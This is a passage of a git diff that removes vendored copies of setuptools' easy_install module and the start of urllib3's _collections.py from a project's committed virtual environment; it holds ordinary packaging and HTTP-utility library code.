easy-install.pth", - dist, - ) - else: - log.info("Adding %s to easy-install.pth file", dist) - self.pth_file.add(dist) # add new entry - if dist.location not in self.shadow_path: - self.shadow_path.append(dist.location) - - if self.dry_run: - return - - self.pth_file.save() - - if dist.key != 'setuptools': - return - - # Ensure that setuptools itself never becomes unavailable! - # XXX should this check for latest version? 
- filename = os.path.join(self.install_dir, 'setuptools.pth') - if os.path.islink(filename): - os.unlink(filename) - with open(filename, 'wt') as f: - f.write(self.pth_file.make_relative(dist.location) + '\n') - - def unpack_progress(self, src, dst): - # Progress filter for unpacking - log.debug("Unpacking %s to %s", src, dst) - return dst # only unpack-and-compile skips files for dry run - - def unpack_and_compile(self, egg_path, destination): - to_compile = [] - to_chmod = [] - - def pf(src, dst): - if dst.endswith('.py') and not src.startswith('EGG-INFO/'): - to_compile.append(dst) - elif dst.endswith('.dll') or dst.endswith('.so'): - to_chmod.append(dst) - self.unpack_progress(src, dst) - return not self.dry_run and dst or None - - unpack_archive(egg_path, destination, pf) - self.byte_compile(to_compile) - if not self.dry_run: - for f in to_chmod: - mode = ((os.stat(f)[stat.ST_MODE]) | 0o555) & 0o7755 - chmod(f, mode) - - def byte_compile(self, to_compile): - if sys.dont_write_bytecode: - return - - from distutils.util import byte_compile - - try: - # try to make the byte compile messages quieter - log.set_verbosity(self.verbose - 1) - - byte_compile(to_compile, optimize=0, force=1, dry_run=self.dry_run) - if self.optimize: - byte_compile( - to_compile, optimize=self.optimize, force=1, - dry_run=self.dry_run, - ) - finally: - log.set_verbosity(self.verbose) # restore original verbosity - - __no_default_msg = textwrap.dedent(""" - bad install directory or PYTHONPATH - - You are attempting to install a package to a directory that is not - on PYTHONPATH and which Python does not read ".pth" files from. The - installation directory you specified (via --install-dir, --prefix, or - the distutils default setting) was: - - %s - - and your PYTHONPATH environment variable currently contains: - - %r - - Here are some of your options for correcting the problem: - - * You can choose a different installation directory, i.e., one that is - on PYTHONPATH or supports .pth files - - * You can add the installation directory to the PYTHONPATH environment - variable. (It must then also be on PYTHONPATH whenever you run - Python and want to use the package(s) you are installing.) - - * You can set up the installation directory to support ".pth" files by - using one of the approaches described here: - - https://setuptools.readthedocs.io/en/latest/deprecated/easy_install.html#custom-installation-locations - - - Please make the appropriate changes for your system and try again. 
- """).strip() - - def create_home_path(self): - """Create directories under ~.""" - if not self.user: - return - home = convert_path(os.path.expanduser("~")) - for name, path in self.config_vars.items(): - if path.startswith(home) and not os.path.isdir(path): - self.debug_print("os.makedirs('%s', 0o700)" % path) - os.makedirs(path, 0o700) - - INSTALL_SCHEMES = dict( - posix=dict( - install_dir='$base/lib/python$py_version_short/site-packages', - script_dir='$base/bin', - ), - ) - - DEFAULT_SCHEME = dict( - install_dir='$base/Lib/site-packages', - script_dir='$base/Scripts', - ) - - def _expand(self, *attrs): - config_vars = self.get_finalized_command('install').config_vars - - if self.prefix: - # Set default install_dir/scripts from --prefix - config_vars = config_vars.copy() - config_vars['base'] = self.prefix - scheme = self.INSTALL_SCHEMES.get(os.name, self.DEFAULT_SCHEME) - for attr, val in scheme.items(): - if getattr(self, attr, None) is None: - setattr(self, attr, val) - - from distutils.util import subst_vars - - for attr in attrs: - val = getattr(self, attr) - if val is not None: - val = subst_vars(val, config_vars) - if os.name == 'posix': - val = os.path.expanduser(val) - setattr(self, attr, val) - - -def _pythonpath(): - items = os.environ.get('PYTHONPATH', '').split(os.pathsep) - return filter(None, items) - - -def get_site_dirs(): - """ - Return a list of 'site' dirs - """ - - sitedirs = [] - - # start with PYTHONPATH - sitedirs.extend(_pythonpath()) - - prefixes = [sys.prefix] - if sys.exec_prefix != sys.prefix: - prefixes.append(sys.exec_prefix) - for prefix in prefixes: - if not prefix: - continue - - if sys.platform in ('os2emx', 'riscos'): - sitedirs.append(os.path.join(prefix, "Lib", "site-packages")) - elif os.sep == '/': - sitedirs.extend([ - os.path.join( - prefix, - "lib", - "python{}.{}".format(*sys.version_info), - "site-packages", - ), - os.path.join(prefix, "lib", "site-python"), - ]) - else: - sitedirs.extend([ - prefix, - os.path.join(prefix, "lib", "site-packages"), - ]) - if sys.platform != 'darwin': - continue - - # for framework builds *only* we add the standard Apple - # locations. 
Currently only per-user, but /Library and - # /Network/Library could be added too - if 'Python.framework' not in prefix: - continue - - home = os.environ.get('HOME') - if not home: - continue - - home_sp = os.path.join( - home, - 'Library', - 'Python', - '{}.{}'.format(*sys.version_info), - 'site-packages', - ) - sitedirs.append(home_sp) - lib_paths = get_path('purelib'), get_path('platlib') - - sitedirs.extend(s for s in lib_paths if s not in sitedirs) - - if site.ENABLE_USER_SITE: - sitedirs.append(site.USER_SITE) - - with contextlib.suppress(AttributeError): - sitedirs.extend(site.getsitepackages()) - - sitedirs = list(map(normalize_path, sitedirs)) - - return sitedirs - - -def expand_paths(inputs): # noqa: C901 # is too complex (11) # FIXME - """Yield sys.path directories that might contain "old-style" packages""" - - seen = {} - - for dirname in inputs: - dirname = normalize_path(dirname) - if dirname in seen: - continue - - seen[dirname] = 1 - if not os.path.isdir(dirname): - continue - - files = os.listdir(dirname) - yield dirname, files - - for name in files: - if not name.endswith('.pth'): - # We only care about the .pth files - continue - if name in ('easy-install.pth', 'setuptools.pth'): - # Ignore .pth files that we control - continue - - # Read the .pth file - f = open(os.path.join(dirname, name)) - lines = list(yield_lines(f)) - f.close() - - # Yield existing non-dupe, non-import directory lines from it - for line in lines: - if line.startswith("import"): - continue - - line = normalize_path(line.rstrip()) - if line in seen: - continue - - seen[line] = 1 - if not os.path.isdir(line): - continue - - yield line, os.listdir(line) - - -def extract_wininst_cfg(dist_filename): - """Extract configuration data from a bdist_wininst .exe - - Returns a configparser.RawConfigParser, or None - """ - f = open(dist_filename, 'rb') - try: - endrec = zipfile._EndRecData(f) - if endrec is None: - return None - - prepended = (endrec[9] - endrec[5]) - endrec[6] - if prepended < 12: # no wininst data here - return None - f.seek(prepended - 12) - - tag, cfglen, bmlen = struct.unpack("egg path translations for a given .exe file""" - - prefixes = [ - ('PURELIB/', ''), - ('PLATLIB/pywin32_system32', ''), - ('PLATLIB/', ''), - ('SCRIPTS/', 'EGG-INFO/scripts/'), - ('DATA/lib/site-packages', ''), - ] - z = zipfile.ZipFile(exe_filename) - try: - for info in z.infolist(): - name = info.filename - parts = name.split('/') - if len(parts) == 3 and parts[2] == 'PKG-INFO': - if parts[1].endswith('.egg-info'): - prefixes.insert(0, ('/'.join(parts[:2]), 'EGG-INFO/')) - break - if len(parts) != 2 or not name.endswith('.pth'): - continue - if name.endswith('-nspkg.pth'): - continue - if parts[0].upper() in ('PURELIB', 'PLATLIB'): - contents = z.read(name).decode() - for pth in yield_lines(contents): - pth = pth.strip().replace('\\', '/') - if not pth.startswith('import'): - prefixes.append((('%s/%s/' % (parts[0], pth)), '')) - finally: - z.close() - prefixes = [(x.lower(), y) for x, y in prefixes] - prefixes.sort() - prefixes.reverse() - return prefixes - - -class PthDistributions(Environment): - """A .pth file with Distribution paths in it""" - - dirty = False - - def __init__(self, filename, sitedirs=()): - self.filename = filename - self.sitedirs = list(map(normalize_path, sitedirs)) - self.basedir = normalize_path(os.path.dirname(self.filename)) - self._load() - Environment.__init__(self, [], None, None) - for path in yield_lines(self.paths): - list(map(self.add, find_distributions(path, True))) - - def 
_load(self): - self.paths = [] - saw_import = False - seen = dict.fromkeys(self.sitedirs) - if os.path.isfile(self.filename): - f = open(self.filename, 'rt') - for line in f: - if line.startswith('import'): - saw_import = True - continue - path = line.rstrip() - self.paths.append(path) - if not path.strip() or path.strip().startswith('#'): - continue - # skip non-existent paths, in case somebody deleted a package - # manually, and duplicate paths as well - path = self.paths[-1] = normalize_path( - os.path.join(self.basedir, path) - ) - if not os.path.exists(path) or path in seen: - self.paths.pop() # skip it - self.dirty = True # we cleaned up, so we're dirty now :) - continue - seen[path] = 1 - f.close() - - if self.paths and not saw_import: - self.dirty = True # ensure anything we touch has import wrappers - while self.paths and not self.paths[-1].strip(): - self.paths.pop() - - def save(self): - """Write changed .pth file back to disk""" - if not self.dirty: - return - - rel_paths = list(map(self.make_relative, self.paths)) - if rel_paths: - log.debug("Saving %s", self.filename) - lines = self._wrap_lines(rel_paths) - data = '\n'.join(lines) + '\n' - - if os.path.islink(self.filename): - os.unlink(self.filename) - with open(self.filename, 'wt') as f: - f.write(data) - - elif os.path.exists(self.filename): - log.debug("Deleting empty %s", self.filename) - os.unlink(self.filename) - - self.dirty = False - - @staticmethod - def _wrap_lines(lines): - return lines - - def add(self, dist): - """Add `dist` to the distribution map""" - new_path = ( - dist.location not in self.paths and ( - dist.location not in self.sitedirs or - # account for '.' being in PYTHONPATH - dist.location == os.getcwd() - ) - ) - if new_path: - self.paths.append(dist.location) - self.dirty = True - Environment.add(self, dist) - - def remove(self, dist): - """Remove `dist` from the distribution map""" - while dist.location in self.paths: - self.paths.remove(dist.location) - self.dirty = True - Environment.remove(self, dist) - - def make_relative(self, path): - npath, last = os.path.split(normalize_path(path)) - baselen = len(self.basedir) - parts = [last] - sep = os.altsep == '/' and '/' or os.sep - while len(npath) >= baselen: - if npath == self.basedir: - parts.append(os.curdir) - parts.reverse() - return sep.join(parts) - npath, last = os.path.split(npath) - parts.append(last) - else: - return path - - -class RewritePthDistributions(PthDistributions): - @classmethod - def _wrap_lines(cls, lines): - yield cls.prelude - for line in lines: - yield line - yield cls.postlude - - prelude = _one_liner(""" - import sys - sys.__plen = len(sys.path) - """) - postlude = _one_liner(""" - import sys - new = sys.path[sys.__plen:] - del sys.path[sys.__plen:] - p = getattr(sys, '__egginsert', 0) - sys.path[p:p] = new - sys.__egginsert = p + len(new) - """) - - -if os.environ.get('SETUPTOOLS_SYS_PATH_TECHNIQUE', 'raw') == 'rewrite': - PthDistributions = RewritePthDistributions - - -def _first_line_re(): - """ - Return a regular expression based on first_line_re suitable for matching - strings. - """ - if isinstance(first_line_re.pattern, str): - return first_line_re - - # first_line_re in Python >=3.1.4 and >=3.2.1 is a bytes pattern. - return re.compile(first_line_re.pattern.decode()) - - -def auto_chmod(func, arg, exc): - if func in [os.unlink, os.remove] and os.name == 'nt': - chmod(arg, stat.S_IWRITE) - return func(arg) - et, ev, _ = sys.exc_info() - # TODO: This code doesn't make sense. What is it trying to do? 
- raise (ev[0], ev[1] + (" %s %s" % (func, arg))) - - -def update_dist_caches(dist_path, fix_zipimporter_caches): - """ - Fix any globally cached `dist_path` related data - - `dist_path` should be a path of a newly installed egg distribution (zipped - or unzipped). - - sys.path_importer_cache contains finder objects that have been cached when - importing data from the original distribution. Any such finders need to be - cleared since the replacement distribution might be packaged differently, - e.g. a zipped egg distribution might get replaced with an unzipped egg - folder or vice versa. Having the old finders cached may then cause Python - to attempt loading modules from the replacement distribution using an - incorrect loader. - - zipimport.zipimporter objects are Python loaders charged with importing - data packaged inside zip archives. If stale loaders referencing the - original distribution, are left behind, they can fail to load modules from - the replacement distribution. E.g. if an old zipimport.zipimporter instance - is used to load data from a new zipped egg archive, it may cause the - operation to attempt to locate the requested data in the wrong location - - one indicated by the original distribution's zip archive directory - information. Such an operation may then fail outright, e.g. report having - read a 'bad local file header', or even worse, it may fail silently & - return invalid data. - - zipimport._zip_directory_cache contains cached zip archive directory - information for all existing zipimport.zipimporter instances and all such - instances connected to the same archive share the same cached directory - information. - - If asked, and the underlying Python implementation allows it, we can fix - all existing zipimport.zipimporter instances instead of having to track - them down and remove them one by one, by updating their shared cached zip - archive directory information. This, of course, assumes that the - replacement distribution is packaged as a zipped egg. - - If not asked to fix existing zipimport.zipimporter instances, we still do - our best to clear any remaining zipimport.zipimporter related cached data - that might somehow later get used when attempting to load data from the new - distribution and thus cause such load operations to fail. Note that when - tracking down such remaining stale data, we can not catch every conceivable - usage from here, and we clear only those that we know of and have found to - cause problems if left alive. Any remaining caches should be updated by - whomever is in charge of maintaining them, i.e. they should be ready to - handle us replacing their zip archives with new distributions at runtime. - - """ - # There are several other known sources of stale zipimport.zipimporter - # instances that we do not clear here, but might if ever given a reason to - # do so: - # * Global setuptools pkg_resources.working_set (a.k.a. 'master working - # set') may contain distributions which may in turn contain their - # zipimport.zipimporter loaders. - # * Several zipimport.zipimporter loaders held by local variables further - # up the function call stack when running the setuptools installation. - # * Already loaded modules may have their __loader__ attribute set to the - # exact loader instance used when importing them. Python 3.4 docs state - # that this information is intended mostly for introspection and so is - # not expected to cause us problems. 
- normalized_path = normalize_path(dist_path) - _uncache(normalized_path, sys.path_importer_cache) - if fix_zipimporter_caches: - _replace_zip_directory_cache_data(normalized_path) - else: - # Here, even though we do not want to fix existing and now stale - # zipimporter cache information, we still want to remove it. Related to - # Python's zip archive directory information cache, we clear each of - # its stale entries in two phases: - # 1. Clear the entry so attempting to access zip archive information - # via any existing stale zipimport.zipimporter instances fails. - # 2. Remove the entry from the cache so any newly constructed - # zipimport.zipimporter instances do not end up using old stale - # zip archive directory information. - # This whole stale data removal step does not seem strictly necessary, - # but has been left in because it was done before we started replacing - # the zip archive directory information cache content if possible, and - # there are no relevant unit tests that we can depend on to tell us if - # this is really needed. - _remove_and_clear_zip_directory_cache_data(normalized_path) - - -def _collect_zipimporter_cache_entries(normalized_path, cache): - """ - Return zipimporter cache entry keys related to a given normalized path. - - Alternative path spellings (e.g. those using different character case or - those using alternative path separators) related to the same path are - included. Any sub-path entries are included as well, i.e. those - corresponding to zip archives embedded in other zip archives. - - """ - result = [] - prefix_len = len(normalized_path) - for p in cache: - np = normalize_path(p) - if (np.startswith(normalized_path) and - np[prefix_len:prefix_len + 1] in (os.sep, '')): - result.append(p) - return result - - -def _update_zipimporter_cache(normalized_path, cache, updater=None): - """ - Update zipimporter cache data for a given normalized path. - - Any sub-path entries are processed as well, i.e. those corresponding to zip - archives embedded in other zip archives. - - Given updater is a callable taking a cache entry key and the original entry - (after already removing the entry from the cache), and expected to update - the entry and possibly return a new one to be inserted in its place. - Returning None indicates that the entry should not be replaced with a new - one. If no updater is given, the cache entries are simply removed without - any additional processing, the same as if the updater simply returned None. - - """ - for p in _collect_zipimporter_cache_entries(normalized_path, cache): - # N.B. pypy's custom zipimport._zip_directory_cache implementation does - # not support the complete dict interface: - # * Does not support item assignment, thus not allowing this function - # to be used only for removing existing cache entries. - # * Does not support the dict.pop() method, forcing us to use the - # get/del patterns instead. 
For more detailed information see the - # following links: - # https://github.com/pypa/setuptools/issues/202#issuecomment-202913420 - # http://bit.ly/2h9itJX - old_entry = cache[p] - del cache[p] - new_entry = updater and updater(p, old_entry) - if new_entry is not None: - cache[p] = new_entry - - -def _uncache(normalized_path, cache): - _update_zipimporter_cache(normalized_path, cache) - - -def _remove_and_clear_zip_directory_cache_data(normalized_path): - def clear_and_remove_cached_zip_archive_directory_data(path, old_entry): - old_entry.clear() - - _update_zipimporter_cache( - normalized_path, zipimport._zip_directory_cache, - updater=clear_and_remove_cached_zip_archive_directory_data) - - -# PyPy Python implementation does not allow directly writing to the -# zipimport._zip_directory_cache and so prevents us from attempting to correct -# its content. The best we can do there is clear the problematic cache content -# and have PyPy repopulate it as needed. The downside is that if there are any -# stale zipimport.zipimporter instances laying around, attempting to use them -# will fail due to not having its zip archive directory information available -# instead of being automatically corrected to use the new correct zip archive -# directory information. -if '__pypy__' in sys.builtin_module_names: - _replace_zip_directory_cache_data = \ - _remove_and_clear_zip_directory_cache_data -else: - - def _replace_zip_directory_cache_data(normalized_path): - def replace_cached_zip_archive_directory_data(path, old_entry): - # N.B. In theory, we could load the zip directory information just - # once for all updated path spellings, and then copy it locally and - # update its contained path strings to contain the correct - # spelling, but that seems like a way too invasive move (this cache - # structure is not officially documented anywhere and could in - # theory change with new Python releases) for no significant - # benefit. - old_entry.clear() - zipimport.zipimporter(path) - old_entry.update(zipimport._zip_directory_cache[path]) - return old_entry - - _update_zipimporter_cache( - normalized_path, zipimport._zip_directory_cache, - updater=replace_cached_zip_archive_directory_data) - - -def is_python(text, filename=''): - "Is this string a valid Python script?" - try: - compile(text, filename, 'exec') - except (SyntaxError, TypeError): - return False - else: - return True - - -def is_sh(executable): - """Determine if the specified executable is a .sh (contains a #! line)""" - try: - with io.open(executable, encoding='latin-1') as fp: - magic = fp.read(2) - except (OSError, IOError): - return executable - return magic == '#!' - - -def nt_quote_arg(arg): - """Quote a command line argument according to Windows parsing rules""" - return subprocess.list2cmdline([arg]) - - -def is_python_script(script_text, filename): - """Is this text, as a whole, a Python script? (as opposed to shell/bat/etc. - """ - if filename.endswith('.py') or filename.endswith('.pyw'): - return True # extension says it's Python - if is_python(script_text, filename): - return True # it's syntactically valid Python - if script_text.startswith('#!'): - # It begins with a '#!' 
line, so check if 'python' is in it somewhere - return 'python' in script_text.splitlines()[0].lower() - - return False # Not any Python I can recognize - - -try: - from os import chmod as _chmod -except ImportError: - # Jython compatibility - def _chmod(*args): - pass - - -def chmod(path, mode): - log.debug("changing mode of %s to %o", path, mode) - try: - _chmod(path, mode) - except os.error as e: - log.debug("chmod failed: %s", e) - - -class CommandSpec(list): - """ - A command spec for a #! header, specified as a list of arguments akin to - those passed to Popen. - """ - - options = [] - split_args = dict() - - @classmethod - def best(cls): - """ - Choose the best CommandSpec class based on environmental conditions. - """ - return cls - - @classmethod - def _sys_executable(cls): - _default = os.path.normpath(sys.executable) - return os.environ.get('__PYVENV_LAUNCHER__', _default) - - @classmethod - def from_param(cls, param): - """ - Construct a CommandSpec from a parameter to build_scripts, which may - be None. - """ - if isinstance(param, cls): - return param - if isinstance(param, list): - return cls(param) - if param is None: - return cls.from_environment() - # otherwise, assume it's a string. - return cls.from_string(param) - - @classmethod - def from_environment(cls): - return cls([cls._sys_executable()]) - - @classmethod - def from_string(cls, string): - """ - Construct a command spec from a simple string representing a command - line parseable by shlex.split. - """ - items = shlex.split(string, **cls.split_args) - return cls(items) - - def install_options(self, script_text): - self.options = shlex.split(self._extract_options(script_text)) - cmdline = subprocess.list2cmdline(self) - if not isascii(cmdline): - self.options[:0] = ['-x'] - - @staticmethod - def _extract_options(orig_script): - """ - Extract any options from the first line of the script. - """ - first = (orig_script + '\n').splitlines()[0] - match = _first_line_re().match(first) - options = match.group(1) or '' if match else '' - return options.strip() - - def as_header(self): - return self._render(self + list(self.options)) - - @staticmethod - def _strip_quotes(item): - _QUOTES = '"\'' - for q in _QUOTES: - if item.startswith(q) and item.endswith(q): - return item[1:-1] - return item - - @staticmethod - def _render(items): - cmdline = subprocess.list2cmdline( - CommandSpec._strip_quotes(item.strip()) for item in items) - return '#!' + cmdline + '\n' - - -# For pbr compat; will be removed in a future version. -sys_executable = CommandSpec._sys_executable() - - -class WindowsCommandSpec(CommandSpec): - split_args = dict(posix=False) - - -class ScriptWriter: - """ - Encapsulates behavior around writing entry point scripts for console and - gui apps. 
- """ - - template = textwrap.dedent(r""" - # EASY-INSTALL-ENTRY-SCRIPT: %(spec)r,%(group)r,%(name)r - import re - import sys - - # for compatibility with easy_install; see #2198 - __requires__ = %(spec)r - - try: - from importlib.metadata import distribution - except ImportError: - try: - from importlib_metadata import distribution - except ImportError: - from pkg_resources import load_entry_point - - - def importlib_load_entry_point(spec, group, name): - dist_name, _, _ = spec.partition('==') - matches = ( - entry_point - for entry_point in distribution(dist_name).entry_points - if entry_point.group == group and entry_point.name == name - ) - return next(matches).load() - - - globals().setdefault('load_entry_point', importlib_load_entry_point) - - - if __name__ == '__main__': - sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) - sys.exit(load_entry_point(%(spec)r, %(group)r, %(name)r)()) - """).lstrip() - - command_spec_class = CommandSpec - - @classmethod - def get_script_args(cls, dist, executable=None, wininst=False): - # for backward compatibility - warnings.warn("Use get_args", EasyInstallDeprecationWarning) - writer = (WindowsScriptWriter if wininst else ScriptWriter).best() - header = cls.get_script_header("", executable, wininst) - return writer.get_args(dist, header) - - @classmethod - def get_script_header(cls, script_text, executable=None, wininst=False): - # for backward compatibility - warnings.warn( - "Use get_header", EasyInstallDeprecationWarning, stacklevel=2) - if wininst: - executable = "python.exe" - return cls.get_header(script_text, executable) - - @classmethod - def get_args(cls, dist, header=None): - """ - Yield write_script() argument tuples for a distribution's - console_scripts and gui_scripts entry points. - """ - if header is None: - header = cls.get_header() - spec = str(dist.as_requirement()) - for type_ in 'console', 'gui': - group = type_ + '_scripts' - for name, ep in dist.get_entry_map(group).items(): - cls._ensure_safe_name(name) - script_text = cls.template % locals() - args = cls._get_script_args(type_, name, header, script_text) - for res in args: - yield res - - @staticmethod - def _ensure_safe_name(name): - """ - Prevent paths in *_scripts entry point names. - """ - has_path_sep = re.search(r'[\\/]', name) - if has_path_sep: - raise ValueError("Path separators not allowed in script names") - - @classmethod - def get_writer(cls, force_windows): - # for backward compatibility - warnings.warn("Use best", EasyInstallDeprecationWarning) - return WindowsScriptWriter.best() if force_windows else cls.best() - - @classmethod - def best(cls): - """ - Select the best ScriptWriter for this environment. - """ - if sys.platform == 'win32' or (os.name == 'java' and os._name == 'nt'): - return WindowsScriptWriter.best() - else: - return cls - - @classmethod - def _get_script_args(cls, type_, name, header, script_text): - # Simply write the stub with no extension. - yield (name, header + script_text) - - @classmethod - def get_header(cls, script_text="", executable=None): - """Create a #! 
line, getting options (if any) from script_text""" - cmd = cls.command_spec_class.best().from_param(executable) - cmd.install_options(script_text) - return cmd.as_header() - - -class WindowsScriptWriter(ScriptWriter): - command_spec_class = WindowsCommandSpec - - @classmethod - def get_writer(cls): - # for backward compatibility - warnings.warn("Use best", EasyInstallDeprecationWarning) - return cls.best() - - @classmethod - def best(cls): - """ - Select the best ScriptWriter suitable for Windows - """ - writer_lookup = dict( - executable=WindowsExecutableLauncherWriter, - natural=cls, - ) - # for compatibility, use the executable launcher by default - launcher = os.environ.get('SETUPTOOLS_LAUNCHER', 'executable') - return writer_lookup[launcher] - - @classmethod - def _get_script_args(cls, type_, name, header, script_text): - "For Windows, add a .py extension" - ext = dict(console='.pya', gui='.pyw')[type_] - if ext not in os.environ['PATHEXT'].lower().split(';'): - msg = ( - "{ext} not listed in PATHEXT; scripts will not be " - "recognized as executables." - ).format(**locals()) - warnings.warn(msg, UserWarning) - old = ['.pya', '.py', '-script.py', '.pyc', '.pyo', '.pyw', '.exe'] - old.remove(ext) - header = cls._adjust_header(type_, header) - blockers = [name + x for x in old] - yield name + ext, header + script_text, 't', blockers - - @classmethod - def _adjust_header(cls, type_, orig_header): - """ - Make sure 'pythonw' is used for gui and 'python' is used for - console (regardless of what sys.executable is). - """ - pattern = 'pythonw.exe' - repl = 'python.exe' - if type_ == 'gui': - pattern, repl = repl, pattern - pattern_ob = re.compile(re.escape(pattern), re.IGNORECASE) - new_header = pattern_ob.sub(string=orig_header, repl=repl) - return new_header if cls._use_header(new_header) else orig_header - - @staticmethod - def _use_header(new_header): - """ - Should _adjust_header use the replaced header? - - On non-windows systems, always use. On - Windows systems, only use the replaced header if it resolves - to an executable on the system. - """ - clean_header = new_header[2:-1].strip('"') - return sys.platform != 'win32' or find_executable(clean_header) - - -class WindowsExecutableLauncherWriter(WindowsScriptWriter): - @classmethod - def _get_script_args(cls, type_, name, header, script_text): - """ - For Windows, add a .py extension and an .exe launcher - """ - if type_ == 'gui': - launcher_type = 'gui' - ext = '-script.pyw' - old = ['.pyw'] - else: - launcher_type = 'cli' - ext = '-script.py' - old = ['.py', '.pyc', '.pyo'] - hdr = cls._adjust_header(type_, header) - blockers = [name + x for x in old] - yield (name + ext, hdr + script_text, 't', blockers) - yield ( - name + '.exe', get_win_launcher(launcher_type), - 'b' # write in binary mode - ) - if not is_64bit(): - # install a manifest for the launcher to prevent Windows - # from detecting it as an installer (which it will for - # launchers like easy_install.exe). Consider only - # adding a manifest for launchers detected as installers. - # See Distribute #143 for details. - m_name = name + '.exe.manifest' - yield (m_name, load_launcher_manifest(name), 't') - - -# for backward-compatibility -get_script_args = ScriptWriter.get_script_args -get_script_header = ScriptWriter.get_script_header - - -def get_win_launcher(type): - """ - Load the Windows launcher (executable) suitable for launching a script. - - `type` should be either 'cli' or 'gui' - - Returns the executable as a byte string. 
- """ - launcher_fn = '%s.exe' % type - if is_64bit(): - launcher_fn = launcher_fn.replace(".", "-64.") - else: - launcher_fn = launcher_fn.replace(".", "-32.") - return resource_string('setuptools', launcher_fn) - - -def load_launcher_manifest(name): - manifest = pkg_resources.resource_string(__name__, 'launcher manifest.xml') - return manifest.decode('utf-8') % vars() - - -def rmtree(path, ignore_errors=False, onerror=auto_chmod): - return shutil.rmtree(path, ignore_errors, onerror) - - -def current_umask(): - tmp = os.umask(0o022) - os.umask(tmp) - return tmp - - -class EasyInstallDeprecationWarning(SetuptoolsDeprecationWarning): - """ - Warning for EasyInstall deprecations, bypassing suppression. - """ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/urllib3/_collections.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/urllib3/_collections.py deleted file mode 100644 index 8bdfb767e6632d51b94145baea17b62306c34d53..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/urllib3/_collections.py +++ /dev/null @@ -1,481 +0,0 @@ -from __future__ import annotations - -import typing -from collections import OrderedDict -from enum import Enum, auto -from threading import RLock - -if typing.TYPE_CHECKING: - # We can only import Protocol if TYPE_CHECKING because it's a development - # dependency, and is not available at runtime. - from typing_extensions import Protocol, Self - - class HasGettableStringKeys(Protocol): - def keys(self) -> typing.Iterator[str]: - ... - - def __getitem__(self, key: str) -> str: - ... - - -__all__ = ["RecentlyUsedContainer", "HTTPHeaderDict"] - - -# Key type -_KT = typing.TypeVar("_KT") -# Value type -_VT = typing.TypeVar("_VT") -# Default type -_DT = typing.TypeVar("_DT") - -ValidHTTPHeaderSource = typing.Union[ - "HTTPHeaderDict", - typing.Mapping[str, str], - typing.Iterable[typing.Tuple[str, str]], - "HasGettableStringKeys", -] - - -class _Sentinel(Enum): - not_passed = auto() - - -def ensure_can_construct_http_header_dict( - potential: object, -) -> ValidHTTPHeaderSource | None: - if isinstance(potential, HTTPHeaderDict): - return potential - elif isinstance(potential, typing.Mapping): - # Full runtime checking of the contents of a Mapping is expensive, so for the - # purposes of typechecking, we assume that any Mapping is the right shape. - return typing.cast(typing.Mapping[str, str], potential) - elif isinstance(potential, typing.Iterable): - # Similarly to Mapping, full runtime checking of the contents of an Iterable is - # expensive, so for the purposes of typechecking, we assume that any Iterable - # is the right shape. - return typing.cast(typing.Iterable[typing.Tuple[str, str]], potential) - elif hasattr(potential, "keys") and hasattr(potential, "__getitem__"): - return typing.cast("HasGettableStringKeys", potential) - else: - return None - - -class RecentlyUsedContainer(typing.Generic[_KT, _VT], typing.MutableMapping[_KT, _VT]): - """ - Provides a thread-safe dict-like container which maintains up to - ``maxsize`` keys while throwing away the least-recently-used keys beyond - ``maxsize``. - - :param maxsize: - Maximum number of recent elements to retain. - - :param dispose_func: - Every time an item is evicted from the container, - ``dispose_func(value)`` is called. 
Callback which will get called - """ - - _container: typing.OrderedDict[_KT, _VT] - _maxsize: int - dispose_func: typing.Callable[[_VT], None] | None - lock: RLock - - def __init__( - self, - maxsize: int = 10, - dispose_func: typing.Callable[[_VT], None] | None = None, - ) -> None: - super().__init__() - self._maxsize = maxsize - self.dispose_func = dispose_func - self._container = OrderedDict() - self.lock = RLock() - - def __getitem__(self, key: _KT) -> _VT: - # Re-insert the item, moving it to the end of the eviction line. - with self.lock: - item = self._container.pop(key) - self._container[key] = item - return item - - def __setitem__(self, key: _KT, value: _VT) -> None: - evicted_item = None - with self.lock: - # Possibly evict the existing value of 'key' - try: - # If the key exists, we'll overwrite it, which won't change the - # size of the pool. Because accessing a key should move it to - # the end of the eviction line, we pop it out first. - evicted_item = key, self._container.pop(key) - self._container[key] = value - except KeyError: - # When the key does not exist, we insert the value first so that - # evicting works in all cases, including when self._maxsize is 0 - self._container[key] = value - if len(self._container) > self._maxsize: - # If we didn't evict an existing value, and we've hit our maximum - # size, then we have to evict the least recently used item from - # the beginning of the container. - evicted_item = self._container.popitem(last=False) - - # After releasing the lock on the pool, dispose of any evicted value. - if evicted_item is not None and self.dispose_func: - _, evicted_value = evicted_item - self.dispose_func(evicted_value) - - def __delitem__(self, key: _KT) -> None: - with self.lock: - value = self._container.pop(key) - - if self.dispose_func: - self.dispose_func(value) - - def __len__(self) -> int: - with self.lock: - return len(self._container) - - def __iter__(self) -> typing.NoReturn: - raise NotImplementedError( - "Iteration over this class is unlikely to be threadsafe." - ) - - def clear(self) -> None: - with self.lock: - # Copy pointers to all values, then wipe the mapping - values = list(self._container.values()) - self._container.clear() - - if self.dispose_func: - for value in values: - self.dispose_func(value) - - def keys(self) -> set[_KT]: # type: ignore[override] - with self.lock: - return set(self._container.keys()) - - -class HTTPHeaderDictItemView(typing.Set[typing.Tuple[str, str]]): - """ - HTTPHeaderDict is unusual for a Mapping[str, str] in that it has two modes of - address. - - If we directly try to get an item with a particular name, we will get a string - back that is the concatenated version of all the values: - - >>> d['X-Header-Name'] - 'Value1, Value2, Value3' - - However, if we iterate over an HTTPHeaderDict's items, we will optionally combine - these values based on whether combine=True was called when building up the dictionary - - >>> d = HTTPHeaderDict({"A": "1", "B": "foo"}) - >>> d.add("A", "2", combine=True) - >>> d.add("B", "bar") - >>> list(d.items()) - [ - ('A', '1, 2'), - ('B', 'foo'), - ('B', 'bar'), - ] - - This class conforms to the interface required by the MutableMapping ABC while - also giving us the nonstandard iteration behavior we want; items with duplicate - keys, ordered by time of first insertion. 
